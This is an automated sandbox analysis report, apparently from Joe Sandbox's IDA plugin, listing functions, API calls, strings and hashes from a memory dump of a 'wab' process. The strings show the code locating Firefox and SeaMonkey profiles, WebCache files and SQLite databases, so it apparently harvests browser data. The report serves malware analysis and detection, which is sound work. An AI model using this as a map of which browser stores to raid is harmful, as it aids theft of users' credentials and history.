                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403F6B
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                            • API String ID: 3527940856-2068335096
                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00403FE1
                                                            • memset.MSVCRT ref: 00403FF6
                                                            • memset.MSVCRT ref: 0040400B
                                                            • memset.MSVCRT ref: 00404020
                                                            • memset.MSVCRT ref: 00404035
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 004040FC
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                            • API String ID: 3527940856-3369679110
                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                            • API String ID: 3510742995-2641926074
                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 004033B7
                                                            • memcpy.MSVCRT ref: 004033D0
                                                            • wcscmp.MSVCRT ref: 004033FC
                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                            • String ID: $0.@
                                                            • API String ID: 3030842498-1896041820
                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2941347001-0
                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00403C09
                                                            • memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                            • wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • wcscat.MSVCRT ref: 00403C70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                            • API String ID: 3249829328-1174173950
                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040A824
                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • wcscpy.MSVCRT ref: 0040A854
                                                            • wcscat.MSVCRT ref: 0040A86A
                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 669240632-0
                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcschr.MSVCRT ref: 00414458
                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                            • String ID: "%s"
                                                            • API String ID: 1343145685-3297466227
                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                            • String ID: GetProcessTimes$kernel32.dll
                                                            • API String ID: 1714573020-3385500049
                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004087D6
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                            • memset.MSVCRT ref: 00408828
                                                            • memset.MSVCRT ref: 00408840
                                                            • memset.MSVCRT ref: 00408858
                                                            • memset.MSVCRT ref: 00408870
                                                            • memset.MSVCRT ref: 00408888
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2911713577-0
                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcmp
                                                            • String ID: @ $SQLite format 3
                                                            • API String ID: 1475443563-3708268960
                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            • memset.MSVCRT ref: 00414C87
                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 2705122986-2036018995
                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            • API String ID: 1579243037-1578091866
                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040E60F
                                                            • memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            Strings
                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                            • API String ID: 3354267031-2114579845
                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                            • API String ID: 2221118986-1725073988
                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotificationSleep
                                                            • String ID: }A
                                                            • API String ID: 1821831730-2138825249
                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@DeleteObject
                                                            • String ID: r!A
                                                            • API String ID: 1103273653-628097481
                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            • memcmp.MSVCRT ref: 00444BA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$memcmp
                                                            • String ID: $$8
                                                            • API String ID: 2808797137-435121686
                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            • too many columns on %s, xrefs: 00430763
                                                            • duplicate column name: %s, xrefs: 004307FE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: duplicate column name: %s$too many columns on %s
                                                            • API String ID: 0-1445880494
                                                            • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                            • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                            • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                            • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
